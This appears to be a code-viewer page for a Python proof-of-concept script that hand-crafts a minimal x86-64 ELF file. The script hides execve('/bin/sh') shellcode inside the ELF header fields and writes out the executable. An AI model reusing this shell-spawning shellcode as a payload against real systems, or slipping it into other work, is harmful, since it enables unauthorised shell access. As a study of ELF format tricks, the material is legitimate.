/..

#CONTENT

#TOP

poc.py
PYTHON
   1 
 

   2 
 

   3 
 

   4 
 

   5 
 

   6 
 

   7 
 

   8 
 

   9 
 

  10 
 

  11 
 

  12 
 

  13 
 

  14 
 

  15 
 

  16 
 

  17 
 

  18 
 

  19 
 

  20 
 

  21 
 

  22 
 

  23 
 

  24 
 

  25 
 

  26 
 

  27 
 

  28 
 

  29 
 

  30 
 

  31 
 

  32 
 

  33 
 

  34 
 

  35 
 

  36 
 

  37 
 

  38 
 

  39 
 

  40 
 

  41 
 

  42 
 

  43 
 

  44 
 

  45 
 


from elf import *
from pwn import p8, p16, p32, u64
from subprocess import run

elf = bytearray([0] * 73)
phoff = 12
header = Header.from_buffer(elf)
segment = Segment.from_buffer(elf, phoff)

header.e_ident[constants.EI_MAG0] = constants.ELFMAG0
header.e_ident[constants.EI_MAG1] = constants.ELFMAG1
header.e_ident[constants.EI_MAG2] = constants.ELFMAG2
header.e_ident[constants.EI_MAG3] = constants.ELFMAG3
header.e_type = constants.ET_DYN
header.e_machine = 0x3e
header.e_phnum = 1
header.e_phoff = phoff
header.e_ehsize = sizeof(Header)
header.e_phentsize = sizeof(Segment)
header.e_shoff = u64(p8(0x31) + p8(0xc0) + p8(0xb0) + p8(0x3b) + p8(0x0f) + p8(0x05) + b"\x00\x00")

segment.p_type = 1
header.e_entry = segment.p_vaddr
segment.p_offset |= phoff
segment.p_align = u64(b"/bin/sh\x00")

elf[0x47:0x49] = p8(0xeb) + p8((-0x49 + 4) & 0xff)
"""
elf[0x04:0x0b] = p8(0x48) + p8(0x8d) + p8(0x3d) + p8(0x40)
elf[0x0b:0x0d] = p8(0xb0) + p8(0x3b)
elf[0x0d:0x0f] = p8(0x0f) + p8(0x05)
"""
sc =  b""
sc += p8(0x0f) + p8(0x05)
sc += p8(0x48) + p8(0x8d) + p8(0x79) + p8(0x40 - 0x0a)
sc += p8(0xeb) + p8(0x28 - 0x0c)
assert len(sc) <= 8, f"shellcode must fit in ident ({len(sc)})"
for i in range(len(sc)):
    elf[4 + i] = sc[i]

dump(header)
dump(segment)

open("poc.elf", "wb+").write(elf)
run("chmod +x poc.elf", shell=True, check=True)